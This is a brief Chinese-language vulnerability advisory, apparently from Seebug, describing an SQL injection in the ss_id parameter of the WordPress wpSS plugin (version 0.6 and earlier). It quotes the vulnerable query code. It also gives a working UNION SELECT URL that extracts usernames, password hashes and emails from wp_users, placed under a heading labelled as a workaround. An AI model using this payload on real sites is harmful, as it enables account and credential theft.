WordPress wpSS插件ss_id参数SQL注入漏洞

2008-04-29T00:00:00
ID SSV:3227
Type seebug
Reporter Root
Modified 2008-04-29T00:00:00

Description

BUGTRAQ ID: 28894

wpSS是WordPress中所使用的电子表格插件,允许在WordPress博客中嵌入交互式的电子表格。

wpSS插件的wpSS/ss_load.php文件中没有正确地过滤对ss_id参数的数便用在了SQL查询中:

ss_load.php $id = $_GET['ss_id']; .... ss_functions.php: function ss_load ($id, $plain=FALSE) { .... if ($wpdb->query("SELECT * FROM $table_name WHERE id='$id'") == 0) { ....

这允许远程攻击者通过注入任意SQL代码操控SQL查询,导致执行任意代码。

WordPress wpSS <= 0.6 v 临时解决方法:

<a href=http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1 target=_blank>http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1</a>,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain

厂商补丁:

WordPress

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=http://timrohrer.com/blog/?page_id=71 target=_blank>http://timrohrer.com/blog/?page_id=71</a>